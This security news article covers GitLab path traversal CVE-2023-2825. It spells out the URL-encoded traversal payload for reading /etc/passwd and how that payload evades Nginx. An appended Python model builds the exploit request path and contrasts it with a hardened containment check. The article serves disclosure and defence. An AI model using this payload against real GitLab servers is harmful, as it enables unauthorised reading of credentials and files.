PoC Exploit Released for GitLab CVE-2023-2825 Vulnerability
GitLab, the collaboration platform used by millions of developers worldwide, has released an emergency security update, version 16.0.1. It fixes a critical path traversal flaw, tracked as CVE-2023-2825, that carries the maximum score of 10.0 on the CVSS v3.1 severity scale.
The vulnerability was found by a security researcher known as 'pwnie', who reported it through GitLab's HackerOne bug bounty program. It affects GitLab Community Edition (CE) and Enterprise Edition (EE) version 16.0.0; earlier versions do not appear to be affected.
Understanding the Threat
CVE-2023-2825 stems from a path traversal bug that lets an unauthenticated attacker read arbitrary files on the server, provided an attachment exists in a public project nested within at least five groups. This unusual prerequisite suggests the problem lies in how GitLab resolves the paths of attached files when a project sits several group levels deep.
Successful exploitation could expose sensitive data such as proprietary source code, user credentials, tokens, configuration files and private information. Because the flaw was so recently discovered and is so severe, the vendor withheld further details at the time of disclosure.
Decoding the Exploitation
Vitellozzo, a security expert at the cybersecurity firm Occamsec, has released a proof of concept (PoC) showing how CVE-2023-2825 can be exploited. The exploit depends on the peculiar requirement that the project be nested within at least five groups. Testing showed a direct relationship between the number of groups and the number of directories that could be traversed: nesting the project under N + 1 groups allowed N directory levels to be climbed.
File attachments in a standard GitLab install are stored under the /var/opt/gitlab/gitlab-rails/uploads/@hashed/… path. To reach the filesystem root, one must traverse back 10 directories – implying the need for 11 groups.
The Exploitation in Action
When an attachment is uploaded to a GitLab issue, a POST request is sent to /:repo/upload and GitLab returns a JSON response containing the file URL, which has the form /:repo/uploads/:id/:file, where :file is the file name. GitLab does not sanitize the :file segment when the file is later requested, which is what makes the path traversal possible.
To exploit the flaw, the attacker URL-encodes the '/' characters in the traversal sequence placed in the :file segment (for example, ..%2F..%2F…%2Fetc%2Fpasswd). The router treats the encoded segment as a single parameter value, and GitLab decodes it internally before resolving the path. In testing, encoding only the '/' characters was enough to get past Nginx's path checks.
An unauthenticated attacker can only exploit this against public repositories that meet the nested-group requirement; for any other repository, the attacker first needs an account with access to it.
The researcher's proof of concept is written in Python. It creates the 11 groups, creates a public repository beneath them, uploads a file, and then exploits the vulnerability to read /etc/passwd. The PoC for CVE-2023-2825 has been published by the researcher.
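The following is an added, offline model of the traversal mechanics described above; it is not the researcher's PoC and sends no HTTP requests. It assumes the Omnibus uploads path the article names, uses placeholder hashed-path components, group names and an upload id (all constructed for illustration), and pairs a model of the flawed path resolution with the containment check a fixed server must perform.

```python
"""Offline model of the CVE-2023-2825 traversal: depth arithmetic, encoded
:file construction, and vulnerable vs. hardened path resolution.
Illustrative example only; not the published PoC."""
import posixpath
from urllib.parse import quote, unquote

# Attachment storage root on a standard (Omnibus) install, as named in the article.
UPLOADS_ROOT = "/var/opt/gitlab/gitlab-rails/uploads"

# Constructed example of one attachment's directory below that root. The
# hashed components ("ab/cd/abcd1234") and the secret ("9f8e7d6c") are
# placeholders, not values taken from a real instance.
EXAMPLE_ATTACHMENT_DIR = UPLOADS_ROOT + "/@hashed/ab/cd/abcd1234/9f8e7d6c"


def depth_from_root(directory: str) -> int:
    """Number of '..' hops needed to climb from `directory` to the filesystem root."""
    return len([p for p in directory.strip("/").split("/") if p])


def groups_required(directory: str) -> int:
    """The article reports that N + 1 nested groups allow N directories of
    traversal, so reaching '/' from `directory` needs depth + 1 groups."""
    return depth_from_root(directory) + 1


def build_file_param(directory: str, target: str) -> str:
    """Build the :file value for /:repo/uploads/:id/:file.

    quote(..., safe="") percent-encodes every '/' as %2F but leaves '.'
    untouched, which matches the article's note that encoding only the
    slashes was enough to get past Nginx while GitLab decoded the value."""
    hops = depth_from_root(directory)
    raw = "/".join([".."] * hops + [target.lstrip("/")])
    return quote(raw, safe="")


def request_path(groups: list[str], project: str, upload_id: str, file_param: str) -> str:
    """Assemble the file URL in the /:repo/uploads/:id/:file shape the article describes."""
    repo = "/".join(groups + [project])
    return f"/{repo}/uploads/{upload_id}/{file_param}"


def vulnerable_resolve(directory: str, file_param: str) -> str:
    """Model of the flawed behaviour: decode the segment and join it onto the
    attachment directory with no containment check."""
    return posixpath.normpath(posixpath.join(directory, unquote(file_param)))


def escapes_root(directory: str, file_param: str) -> bool:
    """True when the decoded, normalised path leaves UPLOADS_ROOT."""
    resolved = vulnerable_resolve(directory, file_param)
    return resolved != UPLOADS_ROOT and not resolved.startswith(UPLOADS_ROOT + "/")


def hardened_resolve(directory: str, file_param: str) -> str:
    """The check a fixed server must make: decode, normalise, then refuse any
    result outside the uploads root before touching the filesystem."""
    if escapes_root(directory, file_param):
        raise PermissionError("attachment path escapes uploads root")
    return vulnerable_resolve(directory, file_param)


if __name__ == "__main__":
    # Constructed group names and upload id; the nesting depth is what matters.
    groups = [f"g{i}" for i in range(1, groups_required(EXAMPLE_ATTACHMENT_DIR) + 1)]
    param = build_file_param(EXAMPLE_ATTACHMENT_DIR, "/etc/passwd")
    print("groups needed:", len(groups))
    print("request path :", request_path(groups, "proj", "deadbeef", param))
    print("flawed server resolves to:", vulnerable_resolve(EXAMPLE_ATTACHMENT_DIR, param))
    print("escapes root?", escapes_root(EXAMPLE_ATTACHMENT_DIR, param))
```

The depth arithmetic reproduces the article's numbers: the example directory is ten levels below '/', so ten '..' hops and eleven groups are needed. The hardened resolver shows why the fix must operate on the decoded, normalised path rather than on the raw URL segment: the raw segment contains no '/' at all, so a check that only looks for slashes would pass it.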
The Aftermath
Given the severity of the flaw and the public availability of an exploit, administrators running GitLab 16.0.0 should update to version 16.0.1 or later without delay.